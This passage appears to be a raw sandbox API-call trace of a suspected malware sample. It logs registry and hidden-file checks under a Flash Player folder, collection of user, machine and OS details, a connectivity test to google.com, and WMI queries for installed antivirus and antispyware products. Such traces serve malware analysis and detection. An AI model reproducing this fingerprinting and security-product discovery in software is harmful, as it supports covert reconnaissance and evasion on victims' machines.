pszDest="EB") returned 2 [0312.962] wvnsprintfW (in: pszDest=0x298f5d0, cchDest=3, pszFmt="%02X", arglist=0x298f5ac | out: pszDest="F6") returned 2 [0312.962] wvnsprintfW (in: pszDest=0x298f5d0, cchDest=3, pszFmt="%02X", arglist=0x298f5ac | out: pszDest="34") returned 2 [0312.962] wvnsprintfW (in: pszDest=0x298f5d0, cchDest=3, pszFmt="%02X", arglist=0x298f5ac | out: pszDest="7B") returned 2 [0312.962] wvnsprintfW (in: pszDest=0x298f5d0, cchDest=3, pszFmt="%02X", arglist=0x298f5ac | out: pszDest="63") returned 2 [0312.962] wvnsprintfW (in: pszDest=0x298f5d0, cchDest=3, pszFmt="%02X", arglist=0x298f5ac | out: pszDest="2E") returned 2 [0312.962] wvnsprintfW (in: pszDest=0x298f5d0, cchDest=3, pszFmt="%02X", arglist=0x298f5ac | out: pszDest="BC") returned 2 [0312.962] wvnsprintfW (in: pszDest=0x298f5d0, cchDest=3, pszFmt="%02X", arglist=0x298f5ac | out: pszDest="52") returned 2 [0312.962] wvnsprintfW (in: pszDest=0x298f5d0, cchDest=3, pszFmt="%02X", arglist=0x298f5ac | out: pszDest="43") returned 2 [0312.962] wvnsprintfW (in: pszDest=0x298f5d0, cchDest=3, pszFmt="%02X", arglist=0x298f5ac | out: pszDest="37") returned 2 [0312.962] CreateEventW (lpEventAttributes=0x877e4, bManualReset=0, bInitialState=0, lpName="A8F71384332EEBF6347B632EBC524337") returned 0x108 [0312.962] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x298f7ac | out: phkResult=0x298f7ac*=0x10c) returned 0x0 [0312.963] RegQueryValueExW (in: hKey=0x10c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x298f7d8, lpData=0x0, lpcbData=0x298f7c0*=0x0 | out: lpType=0x298f7d8*=0x0, lpData=0x0, lpcbData=0x298f7c0*=0x0) returned 0x2 [0312.963] RegCloseKey (hKey=0x10c) returned 0x0 [0312.963] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0312.969] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x298f7b0 | out: lpFileSize=0x298f7b0*=1776) returned 1 [0312.969] VirtualAlloc (lpAddress=0x0, dwSize=0x6f0, flAllocationType=0x3000, flProtect=0x4) returned 0xf0000 [0312.969] ReadFile (in: hFile=0x10c, lpBuffer=0xf0000, nNumberOfBytesToRead=0x6f0, lpNumberOfBytesRead=0x298f7c0, lpOverlapped=0x0 | out: lpBuffer=0xf0000*, lpNumberOfBytesRead=0x298f7c0*=0x6f0, lpOverlapped=0x0) returned 1 [0312.970] VirtualFree (lpAddress=0xf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0312.970] CloseHandle (hObject=0x10c) returned 1 [0312.972] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0312.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x298f624, cbMultiByte=80, lpWideCharStr=0x298f3e4, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin") returned 80 [0312.973] PathCombineW (in: pszDest=0x89b38, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin" [0312.973] PathRemoveFileSpecW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0312.973] PathRenameExtensionW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin", pszExt=".tmp" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.tmp") returned 1 [0312.973] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\sjpf7mow3gfda.tmp")) returned 0xffffffff [0312.973] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\sjpf7mow3gfda.hin")) returned 0x2020 [0312.973] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\sjpf7mow3gfda.hin"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0312.973] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x298f860 | out: lpFileSize=0x298f860*=0) returned 1 [0312.973] CloseHandle (hObject=0x10c) returned 1 [0312.973] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x298f7a4 | out: phkResult=0x298f7a4*=0x10c) returned 0x0 [0312.973] RegQueryValueExW (in: hKey=0x10c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x298f7d0, lpData=0x0, lpcbData=0x298f7b8*=0x0 | out: lpType=0x298f7d0*=0x0, lpData=0x0, lpcbData=0x298f7b8*=0x0) returned 0x2 [0312.974] RegCloseKey (hKey=0x10c) returned 0x0 [0312.974] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0312.974] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x298f7a8 | out: lpFileSize=0x298f7a8*=1776) returned 1 [0312.974] VirtualAlloc (lpAddress=0x0, dwSize=0x6f0, flAllocationType=0x3000, flProtect=0x4) returned 0xf0000 [0312.974] ReadFile (in: hFile=0x10c, lpBuffer=0xf0000, nNumberOfBytesToRead=0x6f0, lpNumberOfBytesRead=0x298f7b8, lpOverlapped=0x0 | out: lpBuffer=0xf0000*, lpNumberOfBytesRead=0x298f7b8*=0x6f0, lpOverlapped=0x0) returned 1 [0312.974] VirtualFree (lpAddress=0xf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0312.974] CloseHandle (hObject=0x10c) returned 1 [0312.976] GetSystemTime (in: lpSystemTime=0x298f170 | out: lpSystemTime=0x298f170*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x38, wSecond=0x2c, wMilliseconds=0x79)) [0312.976] SystemTimeToFileTime (in: lpSystemTime=0x298f170, lpFileTime=0x298f180 | out: lpFileTime=0x298f180) returned 1 [0312.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0312.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x235bf40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0312.976] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x298f1f8, nSize=0x298f1a4 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x298f1a4) returned 0x1 [0312.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0312.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x2350648, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YKYD69Q\\aETAdzjz", lpUsedDefaultChar=0x0) returned 16 [0312.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DA064951B33C749DEEA4F9B0A440E075", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0312.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DA064951B33C749DEEA4F9B0A440E075", cchWideChar=32, lpMultiByteStr=0x23cfe10, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DA064951B33C749DEEA4F9B0A440E075", lpUsedDefaultChar=0x0) returned 32 [0312.977] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x298f0f4 | out: phkResult=0x298f0f4*=0x11c) returned 0x0 [0312.977] RegQueryValueExW (in: hKey=0x11c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x298f120, lpData=0x0, lpcbData=0x298f108*=0x0 | out: lpType=0x298f120*=0x0, lpData=0x0, lpcbData=0x298f108*=0x0) returned 0x2 [0312.977] RegCloseKey (hKey=0x11c) returned 0x0 [0312.977] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0312.977] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x298f0f8 | out: lpFileSize=0x298f0f8*=1776) returned 1 [0312.977] VirtualAlloc (lpAddress=0x0, dwSize=0x6f0, flAllocationType=0x3000, flProtect=0x4) returned 0xf0000 [0312.978] ReadFile (in: hFile=0x11c, lpBuffer=0xf0000, nNumberOfBytesToRead=0x6f0, lpNumberOfBytesRead=0x298f108, lpOverlapped=0x0 | out: lpBuffer=0xf0000*, lpNumberOfBytesRead=0x298f108*=0x6f0, lpOverlapped=0x0) returned 1 [0312.978] VirtualFree (lpAddress=0xf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0312.978] CloseHandle (hObject=0x11c) returned 1 [0312.979] wvnsprintfW (in: pszDest=0x298f1ac, cchDest=10, pszFmt="%u.%u.%u", arglist=0x298f184 | out: pszDest="2.6.1") returned 5 [0312.979] GetNativeSystemInfo (in: lpSystemInfo=0x298f164 | out: lpSystemInfo=0x298f164*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0312.979] wvnsprintfA (in: pszDest=0x298f1ac, cchDest=10, pszFmt="%u.%u", arglist=0x298f188 | out: pszDest="6.1") returned 3 [0312.979] GetUserDefaultUILanguage () returned 0x409 [0312.979] GetNativeSystemInfo (in: lpSystemInfo=0x298f164 | out: lpSystemInfo=0x298f164*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0312.979] wvnsprintfA (in: pszDest=0x298f1ac, cchDest=10, pszFmt="%u.%u", arglist=0x298f188 | out: pszDest="6.1") returned 3 [0312.979] GetUserDefaultUILanguage () returned 0x409 [0312.980] InternetCrackUrlA (in: lpszUrl="https://www.google.com", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x298f0d8 | out: lpUrlComponents=0x298f0d8) returned 1 [0313.232] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x8a360, cbSize=0x298f10c | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", cbSize=0x298f10c) returned 0x0 [0313.233] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc000c [0313.235] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x2, lpBuffer=0x84024, dwBufferLength=0x4) returned 1 [0313.235] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x8402c, dwBufferLength=0x4) returned 1 [0313.235] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x84034, dwBufferLength=0x4) returned 1 [0313.236] InternetConnectA (hInternet=0xcc000c, lpszServerName="www.google.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0313.237] HttpOpenRequestA (hConnect=0xcc0018, lpszVerb="GET", lpszObjectName="/", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x84000*="text/html", dwFlags=0x8484f700, dwContext=0x0) returned 0xcc0024 [0313.253] HttpSendRequestA (in: hRequest=0xcc0024, lpszHeaders="Connection: close\r\n", dwHeadersLength=0x13, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0314.185] HttpQueryInfoA (in: hRequest=0xcc0024, dwInfoLevel=0x20000013, lpBuffer=0x298effc, lpdwBufferLength=0x298f000, lpdwIndex=0x0 | out: lpBuffer=0x298effc*, lpdwBufferLength=0x298f000*=0x4, lpdwIndex=0x0) returned 1 [0314.185] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0314.185] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x238e9d0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x298f110 | out: lpBuffer=0x238e9d0*, lpdwNumberOfBytesRead=0x298f110*=0x1000) returned 1 [0314.186] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0314.186] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x238f9d0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x298f110 | out: lpBuffer=0x238f9d0*, lpdwNumberOfBytesRead=0x298f110*=0x1000) returned 1 [0314.186] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0314.186] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x23909d0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x298f110 | out: lpBuffer=0x23909d0*, lpdwNumberOfBytesRead=0x298f110*=0x1000) returned 1 [0314.186] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0314.187] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x23919d0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x298f110 | out: lpBuffer=0x23919d0*, lpdwNumberOfBytesRead=0x298f110*=0x1000) returned 1 [0314.187] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0314.187] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x23929d0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x298f110 | out: lpBuffer=0x23929d0*, lpdwNumberOfBytesRead=0x298f110*=0x1000) returned 1 [0314.187] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0314.187] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x23939d0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x298f110 | out: lpBuffer=0x23939d0*, lpdwNumberOfBytesRead=0x298f110*=0x1000) returned 1 [0314.187] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0314.187] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x23949d0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x298f110 | out: lpBuffer=0x23949d0*, lpdwNumberOfBytesRead=0x298f110*=0x1000) returned 1 [0314.187] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0314.188] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x23959d0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x298f110 | out: lpBuffer=0x23959d0*, lpdwNumberOfBytesRead=0x298f110*=0x1000) returned 1 [0314.188] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0314.188] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x23969d0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x298f110 | out: lpBuffer=0x23969d0*, lpdwNumberOfBytesRead=0x298f110*=0x1000) returned 1 [0314.188] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0314.188] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x23979d0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x298f110 | out: lpBuffer=0x23979d0*, lpdwNumberOfBytesRead=0x298f110*=0x1000) returned 1 [0314.188] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0314.188] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x23989d0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x298f110 | out: lpBuffer=0x23989d0*, lpdwNumberOfBytesRead=0x298f110*=0x1000) returned 1 [0314.188] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0314.188] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x23999d0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x298f110 | out: lpBuffer=0x23999d0*, lpdwNumberOfBytesRead=0x298f110*=0x1000) returned 1 [0314.189] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0314.189] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x239a9d0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x298f110 | out: lpBuffer=0x239a9d0*, lpdwNumberOfBytesRead=0x298f110*=0x27b) returned 1 [0314.189] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0314.189] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x239ac4b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x298f110 | out: lpBuffer=0x239ac4b*, lpdwNumberOfBytesRead=0x298f110*=0x0) returned 1 [0314.190] InternetCloseHandle (hInternet=0xcc0024) returned 1 [0314.192] InternetQueryOptionA (in: hInternet=0xcc0018, dwOption=0x15, lpBuffer=0x298f10c, lpdwBufferLength=0x298f108 | out: lpBuffer=0x298f10c, lpdwBufferLength=0x298f108) returned 1 [0314.192] InternetCloseHandle (hInternet=0xcc0018) returned 1 [0314.192] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0314.192] GetTickCount () returned 0x7ba4 [0314.192] GetTimeZoneInformation (in: lpTimeZoneInformation=0x298f0dc | out: lpTimeZoneInformation=0x298f0dc) returned 0x0 [0314.197] GetComputerNameW (in: lpBuffer=0x298f1ac, nSize=0x298f1a4 | out: lpBuffer="YKYD69Q", nSize=0x298f1a4) returned 1 [0314.197] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0314.199] CoCreateInstance (in: rclsid=0x814b0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x4401, riid=0x813e0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x298f160 | out: ppv=0x298f160*=0x38b0828) returned 0x0 [0314.368] WbemLocator:IWbemLocator:ConnectServer (in: This=0x38b0828, strNetworkResource="ROOT\\SecurityCenter", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x298f17c | out: ppNamespace=0x298f17c*=0x38bcfe4) returned 0x0 [0314.642] CoSetProxyBlanket (pProxy=0x38bcfe4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0314.642] IWbemServices:ExecQuery (in: This=0x38bcfe4, strQueryLanguage="WQL", strQuery="Select * from AntiVirusProduct", lFlags=48, pCtx=0x0, ppEnum=0x298f140 | out: ppEnum=0x298f140*=0x38bc754) returned 0x0 [0314.652] IEnumWbemClassObject:Next (in: This=0x38bc754, lTimeout=-1, uCount=0x1, apObjects=0x298f14c, puReturned=0x298f144 | out: apObjects=0x298f14c*=0x0, puReturned=0x298f144*=0x0) returned 0x1 [0314.654] IUnknown:Release (This=0x38bcfe4) returned 0x0 [0314.654] WbemLocator:IUnknown:Release (This=0x38b0828) returned 0x0 [0314.654] CoUninitialize () [0314.656] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0314.656] CoCreateInstance (in: rclsid=0x814b0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x4401, riid=0x813e0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x298f160 | out: ppv=0x298f160*=0x38b0880) returned 0x0 [0314.656] WbemLocator:IWbemLocator:ConnectServer (in: This=0x38b0880, strNetworkResource="ROOT\\SecurityCenter2", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x298f17c | out: ppNamespace=0x298f17c*=0x38bd07c) returned 0x0 [0314.663] CoSetProxyBlanket (pProxy=0x38bd07c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0314.663] IWbemServices:ExecQuery (in: This=0x38bd07c, strQueryLanguage="WQL", strQuery="Select * from AntiVirusProduct", lFlags=48, pCtx=0x0, ppEnum=0x298f140 | out: ppEnum=0x298f140*=0x38bd11c) returned 0x0 [0314.669] IEnumWbemClassObject:Next (in: This=0x38bd11c, lTimeout=-1, uCount=0x1, apObjects=0x298f14c, puReturned=0x298f144 | out: apObjects=0x298f14c*=0x0, puReturned=0x298f144*=0x0) returned 0x1 [0314.670] IUnknown:Release (This=0x38bd07c) returned 0x0 [0314.670] WbemLocator:IUnknown:Release (This=0x38b0880) returned 0x0 [0314.670] CoUninitialize () [0314.671] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0314.671] CoCreateInstance (in: rclsid=0x814b0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x4401, riid=0x813e0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x298f160 | out: ppv=0x298f160*=0x38b0880) returned 0x0 [0314.671] WbemLocator:IWbemLocator:ConnectServer (in: This=0x38b0880, strNetworkResource="ROOT\\SecurityCenter", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x298f17c | out: ppNamespace=0x298f17c*=0x38bd07c) returned 0x0 [0314.675] CoSetProxyBlanket (pProxy=0x38bd07c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0314.675] IWbemServices:ExecQuery (in: This=0x38bd07c, strQueryLanguage="WQL", strQuery="Select * from AntiSpywareProduct", lFlags=48, pCtx=0x0, ppEnum=0x298f140 | out: ppEnum=0x298f140*=0x38bd1e4) returned 0x0 [0314.677] IEnumWbemClassObject:Next (in: This=0x38bd1e4, lTimeout=-1, uCount=0x1, apObjects=0x298f14c, puReturned=0x298f144 | out: apObjects=0x298f14c*=0x0, puReturned=0x298f144*=0x0) returned 0x1 [0314.678] IUnknown:Release (This=0x38bd07c) returned 0x0 [0314.679] WbemLocator:IUnknown:Release (This=0x38b0880) returned 0x0 [0314.679] CoUninitialize () [0314.679] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0314.679] CoCreateInstance (in: rclsid=0x814b0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x4401, riid=0x813e0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x298f160 | out: ppv=0x298f160*=0x38b0880) returned 0x0 [0314.680] WbemLocator:IWbemLocator:ConnectServer (in: This=0x38b0880, strNetworkResource="ROOT\\SecurityCenter2", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x298f17c | out: ppNamespace=0x298f17c*=0x38bd07c) returned 0x0 [0314.683] CoSetProxyBlanket (pProxy=0x38bd07c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0314.683] IWbemServices:ExecQuery (in: This=0x38bd07c, strQueryLanguage="WQL", strQuery="Select * from AntiSpywareProduct", lFlags=48, pCtx=0x0, ppEnum=0x298f140 | out: ppEnum=0x298f140*=0x38bd2ac) returned 0x0 [0314.685] IEnumWbemClassObject:Next (in: 